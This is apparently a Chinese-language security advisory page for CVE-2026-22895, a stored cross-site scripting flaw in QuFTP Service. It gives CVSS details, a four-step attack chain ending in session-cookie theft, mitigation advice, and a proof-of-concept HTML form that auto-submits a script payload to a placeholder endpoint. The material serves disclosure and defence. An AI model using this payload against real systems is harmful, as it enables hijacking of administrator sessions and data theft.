CVE-2026-22895 CVSS 4.8 中危

CVE-2026-22895 QuFTP Service跨站脚本漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22895

漏洞类型

跨站脚本 (XSS)

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

QuFTP Service

漏洞概述

QuFTP Service中存在跨站脚本（XSS）漏洞。攻击者在获得管理员权限后，可利用此漏洞注入恶意脚本，绕过安全机制并读取应用数据。该漏洞影响多个早期版本，目前厂商已发布修复版本，建议用户尽快更新至安全版本。

技术细节

该漏洞主要由于QuFTP Service对特定输入参数缺乏严格的过滤和输出编码机制。攻击者首先需要获取管理员级别的账户凭证（PR:H），这可能通过社会工程学或其他漏洞实现。随后，攻击者在系统的Web管理界面（如FTP用户配置、日志记录或备注字段）提交包含恶意JavaScript代码的数据。由于应用后端未对数据进行有效的转义或过滤处理，导致恶意数据被持久化存储。当具备管理员权限的用户访问包含该数据的页面时，恶意脚本将在其浏览器上下文中执行（UI:R）。攻击者利用此机制，结合管理员的高权限会话，可以窃取Session ID、绕过同源策略限制读取应用敏感数据，或者通过构造特定请求修改系统配置，从而造成更严重的后果。

攻击链分析

STEP 1

步骤1：权限获取

攻击者通过钓鱼、暴力破解或其他手段获取QuFTP Service的管理员账户凭证。

STEP 2

步骤2：注入Payload

攻击者登录Web管理界面，在存在漏洞的输入点（如FTP用户描述、配置项等）插入恶意JavaScript代码。

STEP 3

步骤3：触发漏洞

由于缺乏输出编码，当管理员或其他用户访问包含恶意数据的页面时，浏览器解析并执行该脚本。

STEP 4

步骤4：数据窃取

恶意脚本在管理员浏览器中运行，窃取Session Cookie或读取敏感应用数据，并发送给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-22895 QuFTP Service Stored XSS
Description: Inject a JavaScript payload into a vulnerable field (e.g., FTP username or comment).
-->

<html>
<body>
<form action="http://target-ip:port/cgi-bin/ftp/endpoint" method="POST">
    <input type="text" name="username" value="admin"><!-- Normal input -->
    <!-- Malicious payload stored in the 'description' or 'comment' field -->
    <input type="text" name="comment" value="\"><script>alert(document.cookie)</script>">
    <input type="submit" value="Submit">
</form>
<script>
    // This script simulates the attacker submitting the form automatically
    document.forms[0].submit();
</script>
</body>
</html>

/*
Explanation:
1. The payload `"><script>alert(document.cookie)</script>` breaks out of the input context.
2. When an administrator views the FTP user list, the script executes.
3. This confirms the vulnerability exists.
*/

影响范围

QuFTP Service < 1.4.3

QuFTP Service < 1.5.2

QuFTP Service < 1.6.2

防御指南

临时缓解措施

在无法立即升级的情况下，应严格限制管理员账户的访问来源IP，启用多因素认证（MFA）以防止凭证被盗，并暂时禁用非必要的Web管理界面功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-22895
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-22895
3 Details https://www.cvedetails.com/cve/CVE-2026-22895/
4 VulDB https://vuldb.com/cve/CVE-2026-22895
5 Link https://www.qnap.com/en/security-advisory/qsa-26-15

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表